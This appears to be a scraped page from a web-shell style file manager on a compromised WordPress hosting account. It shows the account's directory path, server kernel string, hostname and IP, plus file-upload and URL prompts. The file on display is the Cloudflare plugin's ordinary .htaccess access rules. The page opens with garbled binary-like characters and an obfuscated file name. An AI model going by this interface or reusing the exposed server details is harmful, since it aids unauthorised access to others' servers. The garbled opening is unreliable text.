PK œqhYî¶J‚ßFßF)nhhjz3kjnjjwmknjzzqznjzmm1kzmjrmz4qmm.itm/*\U8ewW087XJD%onwUMbJa]Y2zT?AoLMavr%5P*/ $#$#$#

Dir : /home/trave494/watchpalace.kerihosting.com/wp-content/plugins/cloudflare/
Server: Linux ngx353.inmotionhosting.com 4.18.0-553.22.1.lve.1.el8.x86_64 #1 SMP Tue Oct 8 15:52:54 UTC 2024 x86_64
IP: 209.182.202.254
Choose File :

Url:
Dir : /home/trave494/watchpalace.kerihosting.com/wp-content/plugins/cloudflare/.htaccess

# Restricts direct access to files that are not intended to be publicly available

# Apache 2.2
<IfModule !mod_authz_core.c>
        Order Deny,Allow
        Deny from all
</IfModule>

# Apache 2.4
<IfModule mod_authz_core.c>
        Require all denied
</IfModule>


# Allows direct access to specific files only

# Cloudflare JS and CSS
<FilesMatch "^.+(js|css)$">
        # Apache 2.2
        <IfModule !mod_authz_core.c>
                Allow from all
        </IfModule>

        # Apache 2.4
        <IfModule mod_authz_core.c>
                Require all granted
        </IfModule>
</FilesMatch>

# Cloudflare images
<FilesMatch "^.+(png|svg|gif|jpg|webp)$">
        # Apache 2.2
        <IfModule !mod_authz_core.c>
                Allow from all
        </IfModule>

        # Apache 2.4
        <IfModule mod_authz_core.c>
                Require all granted
        </IfModule>
</FilesMatch>

# Cloudflare fonts
<FilesMatch "^.+(eot|ttf||otf|woff|woff2)$">
        # Apache 2.2
        <IfModule !mod_authz_core.c>
                Allow from all
        </IfModule>

        # Apache 2.4
        <IfModule mod_authz_core.c>
                Require all granted
        </IfModule>
</FilesMatch>